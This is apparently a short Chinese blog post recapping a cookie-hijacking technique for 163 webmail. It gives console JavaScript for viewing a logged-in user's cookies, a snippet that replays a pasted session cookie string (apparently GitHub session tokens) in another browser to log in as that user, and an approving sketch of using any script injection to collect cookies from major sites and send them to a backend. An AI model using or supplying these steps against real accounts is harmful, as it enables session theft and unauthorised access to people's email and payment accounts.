首先来一篇好文章,刚好看到的：

沉默中的狂怒 —— Cookie 大喷发----------------       http://www.cnblogs.com/index-html/p/mitm-cookie-sniffer.html#3050493

　　我就重复一遍啦:

　　在chrome或者firefox下登陆下163的邮箱；

　　在控制台执行js：

new Image().src = "http://push.webmail.mail.163.com";

　　

　　在控制台可以看到发送的的请求的RequestHeader的cookie;

　　把这段cookie保存下来拉:

 

　　打开另一个浏览器,执行这些代码;

var cookie = '_octo=GH1.1.1197126241.1409639170; logged_in=yes; dotcom_user=user; user_session=T0fclMsdfsdfv0eTN3-CsYUm2OQVnkMsdfUZLn8ZXJLwE7BTIwMEAInT9fptAn; tz=Asia%2FShanghai; _ga=GA1.2.68662887.1409639170; _gat=1; _gh_sess=eyJzZXNzaW9uX2lkIjoiYjI5ZGFlZGQwNGIwN2U5ZjAzZmUxZTIyYjY3MjA1NDYiLCJjb250ZXh0IjoiLyIsInJlZmVycmFsX2NvZGUiOiJodHRwczovL2dpdGh1Yi5jb20vIn0%3D--d4f09b50437a537b45adc451dc8319ac36aaf5fa'; //把你获取的cookie放到cookie这个变量去cookie.split(";").forEach(function(e,i) {
    　　//设置cookie,过期时间为一天;    document.cookie = e+";expired="+new Date(new Date().getTime() + 1000*60*60*24).toGMTString();});

　　我们现在再打开mail.163.com;发现登陆进去了;

　　cookie是用来用户保存在本地的信息；每一个域名或者对应的子域名会保存这些消息，对保存有效期和大小都有限制，后台分配的对应cookie都是唯一的，所以只要cookie匹配，就知道是哪一个用户登陆的。

 

　　所以只要用户了用户的cookie就相当于有了进入你邮箱或者支付宝或者等等等等的后门；soGood；

　　也就是说只要在网页中有任何可以执行JS的机会都可以利用

　　　　new Image().src = "http://push.webmail.mail.163.com;

　　　　new Image().src = "http://www.baidu.com";

　　遍历常见的比较大的网站,然后把劫持的cookie发送到后台, 我们就可以进行匿名登陆了. so Nice;

　　算是复习一遍吧;